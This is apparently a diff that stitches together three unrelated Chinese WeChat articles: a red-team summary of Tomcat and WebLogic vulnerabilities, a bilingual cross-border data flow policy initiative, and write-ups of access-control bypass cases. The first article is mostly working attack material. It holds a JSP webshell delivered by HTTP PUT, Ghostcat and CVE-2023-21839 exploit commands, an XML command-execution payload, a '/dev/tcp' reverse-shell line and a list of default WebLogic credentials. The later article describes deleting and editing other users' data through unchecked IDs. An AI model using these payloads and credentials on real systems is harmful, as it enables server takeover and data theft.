![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/ZRKuxIKRyhXhuxbCGecu4ibia3kSXD8ePQHrSvPSNtC7PmjzQwR88Hu0LpuXdQzamKBCPAXX82anLS8f0FF3LzzQ/640?wx_fmt=jpeg "")

View File

@ -0,0 +1,357 @@
# 中间件常见漏洞总结
原创 LULU 红队蓝军 2024-11-20 10:07
# 1、Tomcat
## 弱口令导致war远程部署getshell
**影响版本**:无
漏洞复现通过弱口令登录使用哥斯拉生成一个木马上传getshell。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RE0lAOOexmTGer8uSciak8fUkcA3CWg6n7ibEh4aTOMHYpmHKY6BCj9Yw/640?wx_fmt=png&from=appmsg "")
点【取消】按钮,跳转至如下页面
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RnIAwAmKsLNSozXrxBcdgs72mDjxrtqadqVZ4YLlic6bvGian10gD56Vg/640?wx_fmt=png&from=appmsg "")
根据页面提示信息在tomcat目录下找到conf文件夹然后找到tomcat-users.xml文件。
如图红色框里的几行代码红框1里的是用户在安装tomcat时设置的密码如果用户在安装时未设定密码则如红框2里的显示。username是账户password是密码。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RfK2SeHgwzNkibr3r1LxkXU4jWibmDuqEFhEgaVUSUCWkic08Yhp3lVBtQ/640?wx_fmt=png&from=appmsg "")
使用哥斯拉声生成木马
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4ReYRus6DTaJPiaBvObdFACteUm1QazqLxMKucOH7PuCWZqgic1u6LtINg/640?wx_fmt=png&from=appmsg "")
得到ws.jsp木马文件将ws.jsp 压缩ws.zip,在一次压缩ws.war后进行上传
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RM3icXTyJuJ6pugH1IicicSWBpYK3iaegNX5KYZUGdug8U6YxhsP2ciayicIw/640?wx_fmt=png&from=appmsg "")
访问是否上传成功
/ws解压后得到ws.jsp  所以访问ws/ws.jsp
哥斯拉链接成功
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RWia06eOCZDkkunNdl1ucSSCH11gklo9oZHd9FoR3ADEpaLMVUlibLBiaw/640?wx_fmt=png&from=appmsg "")
## 文件包含漏洞(CVE-2020-1938)
**漏洞描述:**默认情况下,Apache  Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache  Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响tomcat默认将AJP服务开启并绑定至0.0.0.0/0.
**影响范围**
```
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
```
**前提条件:**
对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP  Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。注意  Tomcat AJP Connector 默认配置下即为开启状态,且监听在 0.0.0.0:8009
**漏洞原理**
Tomcat 配置了两个Connecto它们分别是 HTTP 和 AJP HTTP默认端口为8080处理http请求而AJP默认端口8009用于处理 AJP  协议的请求而AJP比http更加优化多用于反向、集群等漏洞由于Tomcat  AJP协议存在缺陷而导致攻击者利用该漏洞可通过构造特定参数读取服务器webapp下的任意文件以及可以包含任意文件如果有某上传点上传图片马等等即可以获取shell
**漏洞危害:**
攻击者可以读取 Tomcat所有  webapp目录下的任意文件。此外如果网站应用提供文件上传的功能攻击者可以先向服务端上传一个内容含有恶意 JSP  脚本代码的文件(上传的文件本身可以是任意类型的文件,比如图片、纯文本文件等),然后利用 Ghostcat  漏洞进行文件包含,从而达到代码执行的危害
**漏洞复现**
1、下载链接https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip
2、安装JDK并配置环境
3、启动tomcat点击tomcat目录/bin 文件夹下的startup.bat
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R7KQxkaZhDVG550a3vnK6ru5YJGaMQlFTibJ7Lkhv4rlnrjVuhUATlEw/640?wx_fmt=png&from=appmsg "")
**任意文件读取**
可以读取webapps目录下的任何文件
```
 python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xml
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RZHYNaF91xDR2NiblaDPjCVYg2uxgwTKmobKNUpVjocB7cW80IIIfbhQ/640?wx_fmt=png&from=appmsg "")
任意文件包含
1、首先得上传一个要包含的文件内容并将文件上传到webapps目录
test.txt
```
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
```
2、访问该文件内容test.txt
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RibRia6HZGwbpib5pJTv09KiarVkNb1uI5NI8fQgMadMUrQdJy3dcVQVUvQ/640?wx_fmt=png&from=appmsg "")
3、输入命令执行命令
```
python3 cve-2020-10487-v1.py 192.168.1.9 -p 8009 -f exec.txt --rce 1
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RzVCwfU00ekrJFRUu7oVdCxuwdxDomibHwBQZ7zaAObP7enlntNfMGOQ/640?wx_fmt=png&from=appmsg "")
## 文件上传漏洞(CVE-2017-12615)
**漏洞原理**
当 Tomcat 运行在 Windows 主机上,启用了 HTTP PUT 请求方法,可以通过构造请求向服务器上传包含任意代码的 JSP 文件,导致 JSP 文件中的代码能够被服务器执行
**影响范围:**
Tomcat 7.0.0 - 7.0.81
**漏洞描述**Apache Tomcat 7.0.0 - 7.0.79漏洞产生原因在这个Dockerfile文件中通过修改web.xml文件来添加一个名为readonly的参数其值为false
**漏洞复现:**
靶场搭建可以直接使用vulhub
可以看到readonly值为false
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4Rf40oL48BHEhRRGUNRwxYnuHGXshpzSEJ6vwakMtztdWDtJAVmWb4tg/640?wx_fmt=png&from=appmsg "")
```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
<%
    java.io.InputStream is = Runtime.getRuntime()
                            .exec(request.getParameter("command"))
                            .getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    while ((a = is.read(b)) != -1) {
        out.print(new String(b));
    }
%>
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RD8nxwQicibkm5TJNCpFmBQJzFQLnca25kDzCFHH3JpT41auLTC2icY4Zg/640?wx_fmt=png&from=appmsg "")
访问,即可执行任意命令
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RPTOEHno2TicOMRkWHxtygbKA3VbfKsOjAZGVibVMSZ3qiacBpsj13fWwA/640?wx_fmt=png&from=appmsg "")
# 2、Weblogic
## 任意文件读取漏洞
**漏洞原理:**路径下存在任意文件读取: /hello/file.jsp?path=/etc/passwd
**影响范围:**
```
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3
```
**漏洞复现**
通过/etc/passwd读取用户信息
http://xxx:7001/hello/file.jsp?path=/etc/passwd
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R5zkFHFkmYUBB80dLolJv3z3dOdZZMprRHYun5wUaRENtn5g9P55GFQ/640?wx_fmt=png&from=appmsg "")
1、读取密文文件
读取配置文件拿到加密密钥:
```
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R3Gc4dv1TSKbrASl3uRm3kSaibSnuRJac2p2SwxyJ1cfdtWNDIv1DcMg/640?wx_fmt=png&from=appmsg "")
2、读取加密后的密码
使用burp抓包后并将密码存储为.dat文件
```
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RVJSJZwDILRdUico1zqvfbUeLZAAxOf9WnpNjypp5DL7cXpXdMBNm0ng/640?wx_fmt=png&from=appmsg "")
将读取的文件内容生成文件
3、解密
https://github.com/TideSec/Decrypt_Weblogic_Password
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R0jF8X6AToibbD12c6owKdicAFXn5ytUFVUc6etoy5tjrmHSYA2OtXFdA/640?wx_fmt=png&from=appmsg "")
## 远程命令执行漏洞
CVE-2020-14882: 代码执行漏洞
远程攻击者可以构造特殊的HTTP请求在未经身份验证的情况下接管 WebLogic Server Console并在 WebLogic Server Console 执行任意代码。
CVE-2020-14883: 权限绕过漏洞
远程攻击者可以构造特殊的HTTP请求在未经身份验证的情况下接管 WebLogic Server Console
**漏洞原理**
CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令
**影响范围**
```
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
```
**漏洞复现**
构造xml文件
```
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>
```
访问.xml文件会在tmp生成success文件
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4Rhx36kzwYPOTIlfwxI9d2vIdW5suGaBN7lkgs4yicKlHfKCHFt016nGw/640?wx_fmt=png&from=appmsg "")
同理:修改 .xml文件中<![CDATA[bash-i >& /dev/tcp/攻击机IP/4444 0>&1]>即可反弹shell
## 未授权远程代码执行漏洞(CVE-2023-21839)
**漏洞原理**
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389由于Weblogic  IIOP/T3协议存在缺陷当IIOP/T3协议开启时允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
**影响范围:**
```
12.2.1.2.0
12.2.1.1.0
12.2.1.3.0
12.2.1.0.0
12.2.1.4.0
14.1.1.0.0
12.1.2.0.0
12.1.3.0.0
10.3.6.0
```
**FOFA**
```
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
```
Vulfocus 已经集成该漏洞环境可通过以下环境使用:
```
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release
```
**漏洞环境:**利用vulhub
**漏洞复现:**
下载https://github.com/WhiteHSBG/JNDIExploit
1、搭建ldap服务
```
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i kali的ip
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RxowSdrdOM9s8dNDFYmHic1trp7fm0uOwnRCmXnolWEqOmw8ic5kAzrxw/640?wx_fmt=png&from=appmsg "")
2、kali 开启NC
```
nc -lvvp 9999
```
3、下载EXP
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
执行命令
```
java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口
```
4、成功反弹shell监听成功
![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4Riav7QKFcDjGwg7UOO68Rh2xLvSUq9icFGlRqf5pIyzEc4L48HubgiajlQ/640?wx_fmt=png&from=appmsg "")
**Weblogic常用弱口令**
可以去测试一下是否能登录上
```
weblogic/Oracle@123
system/password
weblogic/weblogic
admin/security
joe/password
mary/password
system/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem
weblogic/weblogic123
weblogic/weblogic2
system/password
weblogic/weblogic
admin/security
joe/password
mary/password
system/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem
guest/guest
portaladmin/portaladmin
system/system
WebLogic/WebLogic
```

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,113 @@
# 全球数据跨境流动合作倡议
中国网络空间安全协会 2024-11-20 04:21
伴随数字技术渗透到人类生产生活的方方面面全球数字经济快速发展数字社会逐步成为人们分享文明进步的新空间。数据作为数字经济的关键要素在创新发展和公共治理中正在发挥越来越重要的作用。数据跨境流动对于各国电子商务、数字贸易乃至经济科技文化等诸多方面至关重要不仅可以有效降低贸易成本提高企业开展国际贸易的能力还有助于促进贸易便利化加快产业数字化转型弥合数字鸿沟实现以数据流动为牵引的新型全球化。目前国际社会正在积极探索形成全球数字领域规则和秩序联合国制定发布《全球数字契约》、世贸组织电子商务谈判以及《全面与进步跨太平洋伙伴关系协定》CPTPP、《数字经济伙伴关系协定》DEPA等多双边实践正在开展这些均体现了推动全球数据跨境流动合作、促进数据跨境流动已经成为各国或地区共同的意愿和选择。
我们注意到,在推动全球数据跨境流动实践的同时,各国普遍关注国家安全、公共利益、个人隐私以及知识产权等风险。我们认为,国际社会应在充分尊重各国、各地区因具体国情、社情而采取的不同政策法规和实践基础上,认真听
取各方数据安全与发展的利益诉求,通过协商的方式推动国家间、地区间数据跨境流动规则形成共识。
我们呼吁各国秉持开放、包容、安全、合作、非歧视的原则,平衡数字技术创新、数字经济发展、数字社会进步与保护国家安全、公共利益、个人隐私和知识产权的关系,在推动数据跨境流动的同时实现各国合法政策目标。我们期待政府、国际组织、企业、民间机构等各主体坚守共商共建共享理念,发挥各自作用,推动全球数据跨境流动合作,携手构建高效便利安全的数据跨境流动机制,打造共赢的数据领域国际合作格局,推动数字红利惠及各国人民。
为此,我们倡议各国政府:
——鼓励因正常商业和社会活动需要而通过电子方式跨境传输数据,以实现全球电子商务和数字贸易为各国经济增长和可持续增长提供新的动力。
——尊重不同国家、不同地区之间数据跨境流动相关制度的差异性。支持不涉及国家安全、公共利益和个人隐私的数据自由流动。允许为实现合法公共政策目标对数据跨境流动进行监管,前提是相关监管措施不构成任意或不合理的歧视或对贸易构成变相限制,不超出实现目标所要求的限度。
——尊重各国依法对涉及国家安全、公共利益的非个人数据采取必要的安全保护措施,保障相关非个人数据跨境安全有序流动。
——尊重各国为保护个人隐私等个人信息权益采取的措施,鼓励各国在保护个人信息的前提下为个人信息跨境传输提供便利途径,建立健全个人信息保护法律和监管框架,鼓励就此交流最佳实践和良好经验,提升个人信息保护机制、规则之间的兼容性,推动相关标准、技术法规及合格评定程序的互认。鼓励企业获得个人信息保护认证,以表明其符合个人信息保护标准,保障个人信息跨境安全有序流动。
——鼓励探索建立数据跨境流动管理负面清单,促进数据跨境高效便利安全流动。
——合力构建开放、包容、安全、合作、非歧视的数据流通使用环境,共同维护公平公正的市场秩序,促进数字经济规范健康发展。
——提高各类数据跨境流动管理措施的透明度、可预见性和非歧视性,以及政策框架的互操作性。
——积极开展数据跨境流动领域的国际合作。支持发展中国家和最不发达国家有效参与和利用数据跨境流动以促进数字经济增长,鼓励发达国家向发展中国家,特别是最不发达国家提供能力建设和技术援助,弥合数字鸿沟,实现公平和可持续发展。
——鼓励利用数字技术促进数据跨境流动创新应用,提高保障数据跨境高效便利安全流动的技术能力,推动数据跨境流动相关的技术与安全保障能力评价标准的国际互认,做好知识产权保护工作。
——反对将数据问题泛安全化,反对在缺乏事实证据的情况下针对特定国家、特定企业差别化制定数据跨境流动限制性政策,实施歧视性的限制、禁止或者其他类似措施。
——禁止通过在数字产品和服务中设置后门、利用数字技术基础设施中的漏洞等手段非法获取数据,共同打击数据领域跨境违法犯罪活动,共同保障各国公民和企业的合法权益。
我们愿意在以上倡议基础上与各方开展和深化数据跨境流动领域的交流合作,我们呼吁各国、各地区通过双多边或地区协议、安排等形式呼应、确认上述倡议。欢迎国际组织、企业、民间机构等各主体支持本倡议。
**Global Cross-border Data Flow**
**Cooperation Initiative**
As digital technologies increasingly permeate every aspect of daily life and production, the global digital economy has experienced rapid development, with digital societies emerging as new spaces for sharing the progress of human civilization. As an essential element in the digital economy, data is playing an increasingly important role in innovative development and public governance. Cross-border data flows are vital to e-commerce, digital trade, and various aspects of global economic, technological and cultural activities. It can reduce trade cost, enhance companies' capacity to engage in international trade, facilitate trade processes, accelerate industrial digitalization, bridge the digital divide, and foster a new type of globalization driven by data flows. Currently, the international community is actively exploring and establishing global rules and order in the digital sphere. Bilateral and multilateral efforts such as the Global Digital Compact by the United Nations, negotiations on e-commerce at the World Trade Organization, the Comprehensive and Progressive Agreement for Trans-Pacific Partnership, and the Digital Economy Partnership Agreement exemplify the shared willingness of and choices made by countries and regions worldwide to promote cooperation on cross-border data flows.
We noticed that, while promoting global cross-border data flows, countries are primarily concerned with risks related to national security, public interests, personal privacy, and intellectual property. We believe that the international community should fully respect the different policies and practices adopted by various countries and regions based on their specific conditions. It is crucial to pay heed to each party's concerns regarding data security and development and to work toward building consensus on cross-border data flow rules through consultation among countries and regions.
We call on all countries to uphold principles of openness, inclusiveness, security, cooperation, and non-discrimination, balance the promotion of digital technology innovation, the development of the digital economy, and the advancement of digital society with the protection of national security, public interests, personal privacy, and intellectual property, and foster cross-border data flows while ensuring that each country's legitimate policy goals are met. We hope that governments, international organizations, businesses, and civil society will adhere to the principles of extensive consultation, joint contribution, and shared benefits. By playing their respective roles, they can promote global cooperation on cross-border data flow, jointly build a mechanism to ensure efficient, convenient and safe cross-border data flow and an open and mutually beneficial landscape for international cooperation in the data sphere, and ensure that the benefits of digital advancements are shared by people worldwide.
To make this happen, we suggest the following:
——Governments should encourage electronic cross-border data transmission to meet the needs of business and social activities. This will help global e-commerce and digital trade serve as new drivers for economic growth and sustainable development.
——Governments should respect the regulatory differences of various countries and regions in cross-border data flows. They should support free data flows that do not violate national security, public interests, and personal privacy. Regulations on cross-border data flows should be permitted when they aim to achieve legitimate public policy objectives on the premise that such regulatory measures do not constitute a means of arbitrary or unjustifiable discrimination or a disguised restriction on international trade, and do not cross the limits of the goals they seek to achieve.
——Governments should respect security measures taken by all countries in accordance with their laws to protect non-personal data related to national security and public interests, and ensure the secure and orderly cross-border flows of relevant non-personal data. 
——Governments should respect measures taken by all countries to protect personal information rights and interests including individual privacy. Countries should be encouraged to provide convenient channels for cross-border transmission of personal information on the condition that such information is well protected. Countries should be encouraged to establish and improve legal and supervision frameworks on personal information protection, conduct exchanges on best practices and experiences, improve the compatibility of personal information protection mechanisms and rules, and foster mutual recognition of relevant standards, technology regulations and conformity assessment procedures. Enterprises should be encouraged to obtain personal information protection certifications to demonstrate their compliance with personal information protection standards and ensure the secure and orderly cross-border flows of personal information. 
——Governments should support exploring the establishment of negative lists for managing cross-border data flow to promote efficient, convenient and safe cross-border data flow.
——Governments should work together to create a data flow and usage environment that is open, inclusive, secure, and non-discriminatory, jointly uphold a fair and just market order, and promote the orderly and healthy development of the digital economy. 
——Governments should enhance the transparency, predictability, and non-discriminatory nature of measures managing the cross-border flows of various types of data, as well as the interoperability of policy frameworks.
——Governments should actively conduct international cooperation in the field of cross-border data flows. Support should be given to developing countries and the least developed countries to enable them to effectively participate in and utilize cross-border data flows so as to promote their digital economic growth. Developed countries should be encouraged to provide capacity building and technical assistance to developing countries, especially the least developed ones, in order to bridge the digital divide and achieve fair and sustainable development. 
——Governments should encourage the use of digital technologies to promote innovative applications in cross-border data flows. They should improve technological capabilities to ensure efficient, convenient and safe cross-border data flows. They should advance international mutual recognition of evaluation standards for technical and security assurance capabilities related to cross-border data flows, and ensure effective intellectual property protection. 
——Governments should oppose overstretching the concept of national security on data issues. They should object to making restrictive and differentiated policies on cross-border data flows targeting specific countries and enterprises without factual evidence, or implementing discriminatory restrictions, prohibitions, and other similar measures against specific countries and enterprises. 
——Governments should prohibit illicit acquisition of data through methods such as setting up backdoors in digital products and services or exploiting vulnerabilities in digital technology infrastructure. They should collaborate to crack down on cross-border illegal activities in the data field and jointly safeguard the legitimate rights and interests of citizens and enterprises in all countries. 
We are ready to carry out and deepen exchanges and cooperation in the field of cross-border data flows with all parties based on the above initiative. We call on all countries and regions to respond to and endorse the above initiative through bilateral, multilateral, or regional agreements and arrangements. We welcome the support of international organizations, businesses, and civil society for this initiative. 
转载来源:“网信中国”微信公众号
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/oVwibkSe4A7TPcLD2ib9sobfacpxkOfJHmoolC01EdiaCUsgdibZ3w4A9abSpGp6ueIyvzyfkE4R3OJ3Y4hqTpc4yw/640?wx_fmt=jpeg "")
**中国网络空间安全协会**
**长按识别左侧二维码,关注我们**

View File

@ -0,0 +1,144 @@
# 几个常见的越权漏洞挖掘案例
原创 十二 起凡安全 2024-11-20 09:31
**水平越权1**
我的随手拍这里,点击删除抓个包
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkERSQfLXamnUMsXKztzicnhQ2Fj3ecxBOvqicv21TU2x1gJUHQfwRmic9cg/640?wx_fmt=png&from=appmsg "")
可以看到是ids这个参数控制的
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkExx2pw2OGIP1e9LI7kgD6icq3jAPBYZyoSVf5ug5K0tHH2dgN3f7iaw2g/640?wx_fmt=png&from=appmsg "")
回到首页,点个查询抓个包
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkEZLJcTtoqHPvyeqfm08hQSS9B3ffkgUGcFq3mMopz5p4wQphKsPeK9Q/640?wx_fmt=png&from=appmsg "")
很明显这个ri_ir参数的值就是我们需要的ids
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkEKghDk0fia3RzHCWgLwJNxxEopFv66SbdaCxY4XYtr02RBFd89326oxA/640?wx_fmt=png&from=appmsg "")
直接复制过来发送回显true
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkEvQYFibDUnZTe3PvUvl3dicZNdu4ojahhjLU71wPlcZ71ic8KiamkpY7l6Q/640?wx_fmt=png&from=appmsg "")
记得回首页验证一下这条数据是否被删除
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64lsaSrqx3P9WxWITGLVftkERoOJPuzW6unaiceFg6pY1daLxVOlaSgOQCVu39XQBKR29an56ye1uRA/640?wx_fmt=png&from=appmsg "")
一般一个地方有越权,像删除增加或者其他功能点大概率也存在越权
**水平越权2**
点击新增功能点
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0PeMUEGh7ALOntib40r5nEd3b1KC7Aic7xcCotdts7yAkpmmnhl6GlPuA/640?wx_fmt=png&from=appmsg "")
这里选择学号,会先进行查询
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0LGb0Q6TRRN1A1MkZodbxkz54dGOlhZ9DaDABggbWKIDupFXf6H5qiag/640?wx_fmt=png&from=appmsg "")
data参数包含学号
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0O3po2069gtcDDWnLFyf1jYPu2HiajzQf8oiaIk0Lh6E237zPYt1KicVibw/640?wx_fmt=png&from=appmsg "")
直接遍历即可,逻辑很简单,只是功能点不容易被发现
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0ibYVms3WUbsYnEY2tzMIRMmfwF318Zch0kutrCjFdoZVz1YXBzsO9IA/640?wx_fmt=png&from=appmsg "")
**垂直越权1**
接口未做鉴权,只判断了用户是否登录,并没有校验用户是否有相应的权限
某功能点
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykN56DpRmMicuNcT4L6lOJaGIBY1JcOTJoSzG8vaGcjnQ8U4Xt0jB1fMXw/640?wx_fmt=png&from=appmsg "")
这里可以看到无任何数据用bp开启拦截F5刷新页面
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNyvbnRSt9VekwEoJhIqnx2u2vKczN6VKMKeEaxiafpibupibJAUpJeGHkQ/640?wx_fmt=png&from=appmsg "")
可以看到这是原有的数据包
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykN3Mph7IxtSnmItN0m4Mfjss3xGlbdzmrZljFuiaSZGjdTALfic7sDYMKg/640?wx_fmt=png&from=appmsg "")
这里把后面参数全删掉,放包
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNxJlaecvFlPTO5jRh4K2Z2ftYHlJHQMZstVqSXGaswHL2elkyIs5PtQ/640?wx_fmt=png&from=appmsg "")
回到浏览器发现返回了全部数据
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNxdBlRPGcpFLSUG6Yd9Np09NmzxERsgkoOJUcZzibEBBU5Zr8WBIGiacA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykN0YjJSZibmXquVDOJqggMOw2Go0wumr9REWjk8iaTasVFL1IH72fbXONA/640?wx_fmt=png&from=appmsg "")
这里全局搜索下查询的接口,很明显可以看到接口的作用是用来编辑的
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNqj6JRXPxCiamU0sa9et6oC5iaicfwgteJtOPPOibBqo8ORIbX5uF1pxokw/640?wx_fmt=png&from=appmsg "")
然后通过查询的接口可以看到字段相关信息
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNRpZH5zKyylibpmibt9de01eNPKYCvGUrJh2BZq9nvadBLYemib1JnIQ4Q/640?wx_fmt=png&from=appmsg "")
直接替换接口,复制上面的字段构造数据包,字段值随便修改,回显操作成功
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNprR4Y2GI0GoSUQ2Psw62Xs9XZYjwVVbhkzrcwLicGGsYMbbWTZtoPfA/640?wx_fmt=png&from=appmsg "")
然后通过越权查询可以看到数据已经被修改了
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64kU8oka4Rw3iaUq59MrpLykNFXkahFQAF2Dvia68HNQGkJmeyD59HSeqRKsqyBDKEhBKZIHLBxwWMvw/640?wx_fmt=png&from=appmsg "")
对于删除增加的接口都是一样的利用思路如果有高权限的账号的话可以直接在低权限没有的功能点进行抓包然后将cookie替换为低权限用户的还是正常返回就是存在漏洞
**垂直越权2**
本来无任何功能点,注册之后需要审核,但是前端泄露了很多接口
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0ZkIpy7kkXd47kYKKZLkYR5ibWSnkR1F3QlDlicic4Prnshic4SjzEdfETg/640?wx_fmt=png&from=appmsg "")
返回管理员账号的一些信息
![](https://mmbiz.qpic.cn/sz_mmbiz_png/CgXd9Hbb64mG9JyKbBbApicF4YaUicMns0cup2dXSibxiaKFO1sKatH02No1ENnyqyeqHmiasOLYoUNEhMqayJjo0FA/640?wx_fmt=png&from=appmsg "")
